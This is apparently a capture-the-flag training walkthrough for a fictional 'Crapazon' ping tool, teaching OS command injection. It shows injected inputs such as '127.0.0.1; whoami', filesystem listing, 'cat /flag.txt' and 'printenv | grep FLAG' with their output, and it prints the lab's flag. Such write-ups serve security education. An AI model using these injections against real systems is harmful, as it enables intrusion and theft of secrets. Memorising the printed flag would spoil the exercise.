HACKR.GG
hackr.gg — Ping Tool — Crapazon Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Ping Tool — Crapazon

Command Injection · OS Command Injection
Difficulty
Intermediate
Vuln class
OS Command Injection
Steps
4
// Objective
Exploit a network diagnostic tool that passes user input directly to a shell command to execute arbitrary OS commands.
// Tools required
BrowserBurp Suite
// Step-by-step walkthrough
1
Understand the target
Crapazon has a "Network Diagnostics" feature that lets sellers ping a host to check connectivity. It takes a hostname/IP as input and runs ping. The backend code is something like: system("ping -c 1 " + userInput)
2
Test for command injection
In Linux/Unix, you can chain commands using ; (semicolon), && (run if previous succeeds), or | (pipe output). Test by appending a second command.
Command / Input
127.0.0.1; whoami
Output
PING 127.0.0.1 (127.0.0.1): 56 data bytes ... root
The whoami output confirms command injection. The server executed both ping AND whoami.
3
Enumerate the server
Now explore. Find out where you are and what's on the filesystem.
Command / Input
127.0.0.1; pwd 127.0.0.1; ls -la 127.0.0.1; ls /var/www/html
4
Read the flag
Flags in command injection rooms are typically stored as environment variables or in a specific file on the filesystem.
Command / Input
127.0.0.1; cat /flag.txt 127.0.0.1; printenv | grep FLAG
Output
HackrGG{cm4nd_1nj3ct10n_p1ng_t00l}
Real-world command injection gives an attacker full server access: reading source code, environment variables (API keys, DB passwords), and potentially a reverse shell.
// Flag
Flag value
HackrGG{cm4nd_1nj3ct10n_p1ng_t00l}
Retrieved by injecting a cat command into the ping tool input.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute